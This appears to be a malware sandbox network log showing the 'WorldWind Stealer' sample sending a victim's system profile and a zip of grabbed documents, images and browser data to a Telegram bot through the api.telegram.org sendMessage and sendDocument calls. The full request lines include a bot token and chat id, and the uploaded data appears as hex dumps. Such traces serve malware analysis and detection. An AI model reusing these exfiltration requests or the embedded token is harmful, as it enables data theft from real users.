                                                                                                                                                            2023-06-23 19:21:37 UTC0INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 23 Jun 2023 19:21:37 GMT
                                                                                                                                                            Content-Type: application/json; charset=utf8
                                                                                                                                                            Content-Length: 88
                                                                                                                                                            Connection: close
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cache-Control: max-age=2678400
                                                                                                                                                            CF-Cache-Status: MISS
                                                                                                                                                            Last-Modified: Fri, 23 Jun 2023 19:21:37 GMT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cx1SeJpnqnLjcDQypTYJrYWF5%2F%2Fq2G2VXkfSlkRsuoL3D%2BrNH7UJvvsue4t9y9V7qSmjZkB8crk%2FSP93MmBO6UTgN8hO2cuSU%2B2Kl2hS2TV09kHHKz66KCY%2BVRaioeixR9xq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Strict-Transport-Security: max-age=0; preload
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 7dbf185b08632c77-FRA
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            2023-06-23 19:21:37 UTC0INData Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 36 38 37 35 34 38 30 39 37 7d
                                                                                                                                                            Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1687548097}


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            1192.168.2.649716149.154.167.220443C:\Users\user\Desktop\file.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2023-06-23 19:21:37 UTC0OUTGET /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202023-06-23%209:21:17%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20116938%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20F8HBZTST%0ARAM:%204095MB%0AHWID:%2067C81467FB%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%2084.17.52.5%0ABSSID:%2000:0c:29:82:cb:33%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%209%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1
                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2023-06-23 19:21:38 UTC2INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                            Date: Fri, 23 Jun 2023 19:21:38 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 2122
                                                                                                                                                            Connection: close
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                            2023-06-23 19:21:38 UTC3INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 39 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 31 35 34 37 31 35 37 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 52 47 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 58 43 68 61 6e 6e 58 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 36 35 30 34 30 37 35 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 31 39 36 5c 75 31 65 65 39 5c 75 30 31 30 64 5c 75 31 65 63 62 5c 75 31 65 31 66 5c 75 30 34 35 34 5c 75 30 34 66 37 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 66 66 37 66 5c 75 30 31 32 66 5c 75 30 32 38 64 5c 75 31 65 34 64 5c 75 31 65 35 64 5c 75 31 65 34 35 5c 75
                                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":3917,"from":{"id":6154715708,"is_bot":true,"first_name":"oRG","username":"XChannX_bot"},"chat":{"id":1165040754,"first_name":"\u0196\u1ee9\u010d\u1ecb\u1e1f\u0454\u04f7","last_name":"\uff7f\u012f\u028d\u1e4d\u1e5d\u1e45\u


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            2192.168.2.649717149.154.167.220443C:\Users\user\Desktop\file.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2023-06-23 19:21:38 UTC5OUTGET /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                            2023-06-23 19:21:38 UTC5INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                            Date: Fri, 23 Jun 2023 19:21:38 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 406
                                                                                                                                                            Connection: close
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                            2023-06-23 19:21:38 UTC5INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 39 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 31 35 34 37 31 35 37 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 52 47 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 58 43 68 61 6e 6e 58 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 36 35 30 34 30 37 35 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 31 39 36 5c 75 31 65 65 39 5c 75 30 31 30 64 5c 75 31 65 63 62 5c 75 31 65 31 66 5c 75 30 34 35 34 5c 75 30 34 66 37 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 66 66 37 66 5c 75 30 31 32 66 5c 75 30 32 38 64 5c 75 31 65 34 64 5c 75 31 65 35 64 5c 75 31 65 34 35 5c 75
                                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":3918,"from":{"id":6154715708,"is_bot":true,"first_name":"oRG","username":"XChannX_bot"},"chat":{"id":1165040754,"first_name":"\u0196\u1ee9\u010d\u1ecb\u1e1f\u0454\u04f7","last_name":"\uff7f\u012f\u028d\u1e4d\u1e5d\u1e45\u


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            3192.168.2.649718149.154.167.220443C:\Users\user\Desktop\file.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2023-06-23 19:21:41 UTC6OUTPOST /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendDocument?chat_id=1165040754 HTTP/1.1
                                                                                                                                                            Content-Type: multipart/form-data; boundary="1b2c3db3-4c43-4a40-ba16-8f0a6647d75a"
                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                            Content-Length: 194790
                                                                                                                                                            Expect: 100-continue
                                                                                                                                                            2023-06-23 19:21:41 UTC6INHTTP/1.1 100 Continue
                                                                                                                                                            2023-06-23 19:21:41 UTC6OUTData Raw: 2d 2d 31 62 32 63 33 64 62 33 2d 34 63 34 33 2d 34 61 34 30 2d 62 61 31 36 2d 38 66 30 61 36 36 34 37 64 37 35 61 0d 0a
                                                                                                                                                            Data Ascii: --1b2c3db3-4c43-4a40-ba16-8f0a6647d75a
                                                                                                                                                            2023-06-23 19:21:41 UTC6OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 31 37 34 38 36 34 32 61 66 65 61 38 35 62 35 34 35 62 66 65 66 32 33 62 64 30 34 34 33 30 64 37 5c 65 6e 67 69 6e 65 65 72 40 31 31 36 39 33 38 5f 65 6e 2d 55 53 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 65 6e 67 69 6e 65 65 72 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 31 37 34 38 36 34 32 61 66 65 61 38 35 62 35 34 35 62 66 65 66 32 33 62 64 30 34 34 33 30 64 37 25 35 43 65 6e 67 69 6e 65 65 72 25
                                                                                                                                                            Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C1748642afea85b545bfef23bd04430d7%5Cuser%
                                                                                                                                                            2023-06-23 19:21:41 UTC6OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 b2 aa d7 56 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 aa aa d7 56 1d 40 64 55 92 01 00 00 59 04 00 00 17 00 00 00 44 69 72 65 63 74 6f 72 69 65 73 5c 44 65 73 6b 74 6f 70 2e 74 78 74 7d 52 cb 6e 83 30 10 3c b7 52 ff 21 5f 60 f5 21 f5 6e b0 8d 31 c1 0f 82 71 83 7a 0b 24 4a 9b 06 d4 f4 90 cf 6f 78 38 d0 6e d5 1b b3 32 3b b3 33 43 ea d3 fb 57 d3 be de dd de 04 96 95 2b a3 43 c5 3b 44 8c 62 bc e0 79 1a f5 c8 26 f2 25 0e 55 99 77 88 61 1c 39 1e 14 d6 f6 28 c2 4e 15 a5 15 ba 43 dc 88 20 23 eb 84 d0 0e cd 9e a2 b7 76 d7 4d 22 11 70 67 48 a6 04 6a 8f c3 44 2e 8d e4 6a e9 02 d4 56 db 6e 32 2d 41 55 b3 39 77 23 19 67 29 4d 70 5a 72 74 3e 9c fa 51 69 d7
                                                                                                                                                            Data Ascii: PKVBrowsers\Google\PKV@dUYDirectories\Desktop.txt}Rn0<R!_`!n1qz$Jox8n2;3CW+C;Dby&%Uwa9(NC #vM"pgHjD.jVn2-AU9w#g)MpZrt>Qi
                                                                                                                                                            2023-06-23 19:21:41 UTC22OUTData Raw: 44 65 73 6b 74 6f 70 5c 57 53 48 45 4a 4d 44 56 51 43 2e 78 6c 73 78 15 93 57 72 40 21 08 45 ff 33 93 45 29 28 56 6c 3c db fe 17 12 f3 cd 80 e7 16 d7 70 26 64 9c 0d 56 a8 de af 6c 9c a9 45 f7 93 ca 2d ce 66 34 e6 1c 35 fa ad 2e 5c b2 0c 71 f9 36 aa fe f2 d2 10 31 8b d1 d6 b3 4a 47 59 0a 5f db 9e 99 30 0e d4 56 b7 e4 ce ed 29 61 38 63 f2 9e de 54 7f dc a5 22 aa 9f 8f ab e5 3b fb 9c cb 97 b5 ac b7 0b dc 9c 6e 33 45 cb 9d d3 9c a3 d4 92 e9 02 b6 6f 05 ab 7a 14 50 73 62 15 a8 ec 31 75 1a 89 e3 95 d9 55 50 3e 1d c2 e9 95 22 3f e3 ee d0 a5 df 50 a3 92 78 d5 ea 41 ea 4c 82 ac d1 77 5c 00 4e 8b 99 86 4e 3d 28 34 72 fa b0 ed dc de 75 97 4e ee b1 c2 74 cd 65 62 20 7d 63 f9 22 80 76 ad 0e 7f 7c 78 af 94 13 42 e8 2d 61 e4 f9 99 8d 11 44 f1 c8 e0 c2 a7 7d 41 95 f6 fa
                                                                                                                                                            Data Ascii: Desktop\WSHEJMDVQC.xlsxWr@!E3E)(Vl<p&dVlE-f45.\q61JGY_0V)a8cT";n3EozPsb1uUP>"?PxALw\NN=(4ruNteb }c"v|xB-aD}A
                                                                                                                                                            2023-06-23 19:21:41 UTC38OUTData Raw: f7 b9 c0 fb ea 5a e0 cf 3b 77 fc bf 51 3b d7 fc db 18 cf 95 64 73 4f 5f 13 ab bf 00 50 4b 03 04 14 00 00 00 08 00 11 7f 10 55 e0 69 f1 7b 81 02 00 00 02 04 00 00 37 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 44 6f 63 75 6d 65 6e 74 73 5c 46 41 41 47 57 48 42 56 55 55 2e 6a 70 67 0d 92 c7 91 45 31 08 04 ef 5b f5 83 12 f2 1e 64 40 52 fe 81 ec bb ce 01 c6 b4 53 ca 4b 00 de 7b e1 65 0c d1 e8 bc 26 c0 4c 5b 16 ee 39 09 6b a0 6d ab 05 a7 87 74 e5 13 90 ab 47 79 18 88 ae 86 2b 2f f2 b8 70 6b c9 f3 c0 e4 58 40 0f 6b 4b 14 9d 4f 2b da 45 b1 cf e4 da b4 33 ae b3 94 6e 38 93 79 fe 93 6e 2e 36 0c 28 7b 1a 56 6f a3 1a 36 2f 2f 38 ab cd db d5 59 c2 89 19 62 76 98 df c2 d8 39 0a 6b b6 09 b4 d5 a9 f2 1b b2 1d 65
                                                                                                                                                            Data Ascii: Z;wQ;dsO_PKUi{7Grabber\DRIVE-C\Users\user\Documents\FAAGWHBVUU.jpgE1[d@RSK{e&L[9kmtGy+/pkX@kKO+E3n8yn.6({Vo6//8Ybv9ke
                                                                                                                                                            2023-06-23 19:21:41 UTC54OUTData Raw: 01 4b a2 87 98 56 07 b3 8b d2 54 f2 7a 5e 96 f8 66 56 db 4c 7b 77 4b 19 2f 8d 68 d5 dd 2a 09 28 bb 22 a4 dd 0e 84 88 aa 5d bc f1 65 89 1a 47 86 96 af 6d c1 c9 09 45 79 38 09 cc e7 37 ab c4 5a 35 ba 75 f3 0a b0 0c 29 1e 08 fd db c6 fd 40 72 cb 95 70 03 81 09 c2 6c dd 87 6d ed 89 d3 b7 d3 7b 76 02 9c 1e 25 0c 59 72 48 95 fc cc a5 80 f2 3d 10 b5 46 84 1e 34 42 b8 92 ba dc b5 d5 c0 47 3b da 01 6f de a8 fa 6c 97 03 f3 7d 1e 83 99 cc cf 8d 76 2c f7 94 b9 fa a5 6c 38 5e cb c7 d3 e9 14 cd b7 3a 4e fe 72 0a 88 cc 41 62 ee dc a7 ec 5b ad a7 64 ed fd 94 6b db e2 ea f9 fc 53 b8 73 dc f5 6c bd d4 e1 26 a9 b9 77 93 f4 9e 58 1c ce 08 c7 75 9f fc d6 5f cf 8c 67 1e 6e 9a 6b bd ea a8 f6 fc c8 ac ff 62 44 c7 94 d5 8c 48 4f 67 a7 82 60 7f 77 ae c2 8e 5e 3b c3 ae 72 77 c6 f7
                                                                                                                                                            Data Ascii: KVTz^fVL{wK/h*("]eGmEy87Z5u)@rplm{v%YrH=F4BG;ol}v,l8^:NrAb[dkSsl&wXu_gnkbDHOg`w^;rw
                                                                                                                                                            2023-06-23 19:21:41 UTC70OUTData Raw: 13 7c a9 99 55 30 2b bc ba 67 3d ed f9 e2 ea a9 47 1f db 47 4f f9 0c 69 ad 94 62 1e b2 ab a3 43 72 31 22 36 f1 6e 8a d6 fe db 98 5c f3 77 51 ba f2 b6 9d 11 57 ba 1f 81 cd d3 52 d2 be 92 45 f5 0f 78 2a e3 2e de 2f 7c 8f 9a 9a c6 10 53 8b 2f 45 4f 60 4f 46 b5 d9 27 eb 6e 82 f9 f0 5e e3 50 0b 61 3e f3 d5 87 a3 58 f0 19 70 05 9c 2a 8f 6b 6a f6 21 5b 93 e9 d8 06 a5 a5 7e e6 16 78 29 13 25 c5 f9 6b 5d 01 cc 3d 50 3c bf 3f 7f 50 4b 03 04 14 00 00 00 08 00 11 7f 10 55 f7 8b 5b 6c 85 02 00 00 02 04 00 00 37 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 44 6f 77 6e 6c 6f 61 64 73 5c 47 4e 4c 51 4e 48 4f 4c 57 42 2e 70 64 66 15 93 49 92 40 21 08 43 f7 5d d5 87 72 04 67 11 c5 e1 fe 07 e9 df 2b 37 50 c4 e4 05 6a
                                                                                                                                                            Data Ascii: |U0+g=GGOibCr1"6n\wQWREx*./|S/EO`OF'n^Pa>Xp*kj![~x)%k]=P<?PKU[l7Grabber\DRIVE-C\Users\user\Downloads\GNLQNHOLWB.pdfI@!C]rg+7Pj
                                                                                                                                                            2023-06-23 19:21:41 UTC86OUTData Raw: a0 e0 69 cc a7 a6 1d 2a ee a8 3c c5 ca 61 2d ee 21 1f df 25 13 72 31 89 bb aa b7 08 68 e5 59 dc 63 02 f8 99 3b 70 c0 9e b6 fc 5d 54 e3 a3 8d 17 b9 22 4e c3 11 48 ef 13 96 ef b0 15 ff b7 aa 90 9a b9 7a 6d bd 9a 3e 06 89 0a bd 87 cc 96 2a 2f 7e 58 ee 09 ac e1 80 c3 e3 e6 53 a0 24 2d 32 e0 ca 99 02 aa bb b2 00 07 8c cd e1 80 15 fc b2 a2 1d 0c e2 38 1a 5e 35 66 57 5f 19 b2 44 41 a5 e7 f3 f8 0e b7 73 13 5e 22 17 c7 ef de b4 44 de a3 9c e5 0b c0 93 fd ec c4 15 9c 2c 4e f8 cb ed fd c7 ae 2d c8 07 cd fc 53 bd b6 d4 5f ae 6f 79 51 ea 7c c6 01 eb 06 33 54 c7 4d 3f 0c 76 36 30 91 ed 61 e4 49 05 d8 84 e6 29 ae 9a 23 85 e6 5b f9 ba 98 70 cc 9b fa e7 9e 38 40 5c 7a 2c 38 2e 38 bd d1 e9 00 07 dc 78 14 e7 eb 29 3d aa e1 a9 49 55 05 ab 84 9d 89 df dc 65 54 78 9f bc f5 a1
                                                                                                                                                            Data Ascii: i*<a-!%r1hYc;p]T"NHzm>*/~XS$-28^5fW_DAs^"D,N-S_oyQ|3TM?v60aI)#[p8@\z,8.8x)=IUeTx
                                                                                                                                                            2023-06-23 19:21:41 UTC102OUTData Raw: 8c c3 92 b8 68 14 aa 4a 0d f4 de dc 0e 54 b8 14 85 b0 9e b1 03 e7 eb bf 44 92 94 5b 10 12 17 e5 25 b2 cb f8 78 4d 24 3a 1d ca 33 e3 cc 53 88 4e 64 1f 4d ba 43 6a 75 51 f5 2c a5 43 15 81 e8 b8 df ea 58 22 0d 55 01 1b fb f2 e6 66 40 f9 79 5e 29 11 6b 8d e4 f0 3b a0 6e 39 ac 16 8a 7e 06 89 ce c4 82 6c 1a 3a c0 e0 51 fd 98 65 8c 3b 1c 3e 15 d4 90 96 9b 12 85 a2 4f 22 72 4f 92 ce 43 0b 55 05 25 73 27 12 d2 3f 4a 7d 50 5f 09 ff f2 50 bf c0 87 23 36 09 03 34 da f8 4f 0d b9 a3 96 cf c4 6b f0 c3 d9 42 1f 9d b1 1c 57 cd 93 29 5d 2f 73 1b dd d4 ac d2 dc 30 d6 2f fc ca 69 f5 d3 ae 1d e5 a0 bf e2 2b 4f ad 9c 63 ee 70 2a 8e 2b 33 b5 65 aa a8 cb b2 cb 3d 4a 09 37 e6 ef bb 91 1a 94 f3 a6 cd f9 43 b8 8f 16 bd 1f c5 2b f1 ab 62 af ee 2f 07 80 f0 cc de 36 38 cd 15 75 f9 ee
                                                                                                                                                            Data Ascii: hJTD[%xM$:3SNdMCjuQ,CX"Uf@y^)k;n9~l:Qe;>O"rOCU%s'?J}P_P#64OkBW)]/s0/i+Ocp*+3e=J7C+b/68u
                                                                                                                                                            2023-06-23 19:21:41 UTC118OUTData Raw: b3 79 91 5c cc ba 37 18 d7 df 46 7c 59 70 71 79 96 a3 ed 30 fa 7c 1e 7d d3 3c a9 7e 8a b6 2c 6c 00 21 57 58 05 89 df 55 26 c1 b3 2f 65 9b 69 95 b8 f6 11 80 b1 08 15 5b 1d 8c ef 85 37 bf e6 c2 8c 31 2b ff 99 e6 76 92 f9 09 54 ea 8a df f7 52 66 16 fe b4 50 37 0a cf 87 5d 1e bd ab f1 08 e3 c0 5b 23 dd 18 1c 16 e3 6a 53 85 3e 9d 1d 5e 28 a8 8f 2c 7c db 37 cd 0f e6 2e 58 ba 7f eb 91 0c aa d8 63 d1 28 65 40 93 0b 6f 25 67 65 ce 50 66 d7 78 a6 66 23 8c 1d a4 e8 aa 0b e7 43 dd 78 a0 6e 41 92 2d 0d bd 70 fd a6 5e ed 62 68 86 f8 50 ec 5f 8e d8 a0 9d ec 28 55 f7 5e f1 37 cf ea 15 7e c3 09 1f 00 6e 99 35 c8 29 e6 1b 39 a9 6e 8f ff 25 00 42 c7 4f a2 c1 62 05 63 73 b8 93 cc bc c1 8a fe a4 a3 a1 ce 36 3b b5 38 ec c9 92 19 eb ed da 14 d3 af 54 7d 54 9e 7d 85 b7 d8 94 a3
                                                                                                                                                            Data Ascii: y\7F|Ypqy0|}<~,l!WXU&/ei[71+vTRfP7][#jS>^(,|7.Xc(e@o%gePfxf#CxnA-p^bhP_(U^7~n5)9n%BObcs6;8T}T}
                                                                                                                                                            2023-06-23 19:21:41 UTC134OUTData Raw: 9f d9 86 1e ee ad 9b 8d 18 18 3d 13 b2 25 d5 3b 53 a4 1a 79 dd 7c 6f 34 03 aa 37 a5 61 d5 7d 2d 7f ae 48 16 df 9d df 9a 9c a8 88 db fe 05 cd 23 35 3f 53 95 83 04 55 1b 0c 7f 72 24 1e 10 fa 3f 64 bd 67 54 53 c1 16 36 1c 41 44 51 40 34 20 20 55 40 08 88 88 80 14 81 80 4a 2f 91 50 8d 14 e9 04 44 9a 74 21 80 22 10 7a 97 00 06 02 a1 48 13 08 bd a9 74 11 29 a1 49 ef bd f7 96 e4 0d f7 de ef 7b 7f bc 6b 91 95 93 99 3d e7 30 67 66 f6 f3 3c e7 cc ec 31 a7 34 3c 53 04 fd 22 82 d5 3b b1 39 05 1d a6 bf ae 54 8d cd e5 46 3e 93 69 c3 a0 87 78 45 0a 7e 8c 11 7b a3 87 92 37 76 3c 25 c2 34 46 ff 93 a4 30 76 f6 de 14 87 39 95 3d 28 14 45 79 75 43 5b 54 d1 05 0a e3 77 fa e8 f6 77 fc ee 1c 15 5c 89 f2 b3 6f 2c bf e7 5f c4 f4 1e 4e fe fd 4d d1 8f fe a8 20 85 e5 00 db 79 20 e1
                                                                                                                                                            Data Ascii: =%;Sy|o47a}-H#5?SUr$?dgTS6ADQ@4 U@J/PDt!"zHt)I{k=0gf<14<S";9TF>ixE~{7v<%4F0v9=(EyuC[Tww\o,_NM y
                                                                                                                                                            2023-06-23 19:21:41 UTC150OUTData Raw: ab 6f 42 5f f7 0e 84 3b 71 4b d1 4c 25 be bf b7 05 09 2f a6 93 a3 52 95 55 cc 69 8e 50 6c 1a 63 8c 28 65 94 ff a3 35 17 f2 f1 38 27 92 fe 8a 91 7a a5 4c a0 5d c7 64 aa b2 8a a9 50 5c 52 9b dd a2 95 68 a5 a2 5c 41 35 5e d6 31 47 e5 3a 6f 2c 73 d4 63 20 1d 2e 72 0e 4c 2f dd f5 63 b5 3d 7f 77 ad 3b d8 58 49 a6 1c 5d ee f3 b5 48 53 9e b5 88 59 51 af 22 8a 4f 7c ac 0a 2c 5c 1f 42 a4 34 d0 6d 3e fd 48 02 74 51 50 37 31 f6 6b 15 c3 ef 04 10 52 8d 1c 9c 6c a3 19 d3 e5 2a 06 7f 08 3b ce 0a 58 eb 8e f9 8f 2e 1b fd 2e 71 ef 5a 4d e9 7c 40 25 b5 7e 82 0c 9b 09 cf fa 13 c9 4a ef 91 af 12 b2 31 c7 d9 34 c0 6d 96 59 b8 96 2e 64 64 bc 19 f3 5b ce 40 73 c8 b8 b2 ca a5 6a eb 9e cb 01 63 bd f4 2a a2 ab f9 da b3 34 f9 f6 c9 bf e8 75 18 90 73 cd e9 08 7d 68 77 66 18 c2 bd 5c
                                                                                                                                                            Data Ascii: oB_;qKL%/RUiPlc(e58'zL]dP\Rh\A5^1G:o,sc .rL/c=w;XI]HSYQ"O|,\B4m>HtQP71kRl*;X..qZM|@%~J14mY.dd[@sjc*4us}hwf\
                                                                                                                                                            2023-06-23 19:21:41 UTC166OUTData Raw: c7 f4 86 f6 ae a5 3b f4 8a 81 a5 34 27 f4 ff 23 5f 01 e2 fb b6 f0 b7 85 60 80 94 c1 91 b4 d6 d6 31 83 e5 f9 55 7f 8f fb c7 d5 dd b0 80 d1 8c ee 1f da 45 2d 1b 3d eb 5b 9f 90 dc a5 d9 a9 84 53 02 84 2a 01 f8 99 56 f1 42 3e 1b 05 22 b0 5d a8 2a 09 9e d3 26 05 36 4a 82 c7 b9 89 c6 b2 c1 93 83 fd c4 81 1a 6a d3 61 fb 72 41 78 9d 8d 57 fd 78 ca 0c 74 51 02 36 81 e0 24 c0 c7 b4 89 e2 84 d9 9f 5e e0 38 4c e0 46 3e 61 b9 e6 37 2c 16 1f 72 81 84 f9 21 40 76 23 10 cf 9b 73 32 dd 32 c9 f0 da 4a dd fc 3f c7 c6 5b 6e dc e0 c9 7e 4a a1 07 ba ba e4 30 b4 22 06 98 8c c9 24 01 d6 e6 0e 06 6a cd 33 53 d2 e7 e2 e5 ed 16 2d 6d 22 46 0c dc d0 cf 4b b0 ce 1b a8 27 cc 14 ed 64 63 44 dc e8 c1 af 49 42 44 94 95 94 a5 57 5d b4 e6 cc e5 70 56 29 ea dc 1c 30 ee 5e 4e 49 3c 01 17 51
                                                                                                                                                            Data Ascii: ;4'#_`1UE-=[S*VB>"]*&6JjarAxWxtQ6$^8LF>a7,r!@v#s22J?[n~J0"$j3S-m"FK'dcDIBDW]pV)0^NI<Q
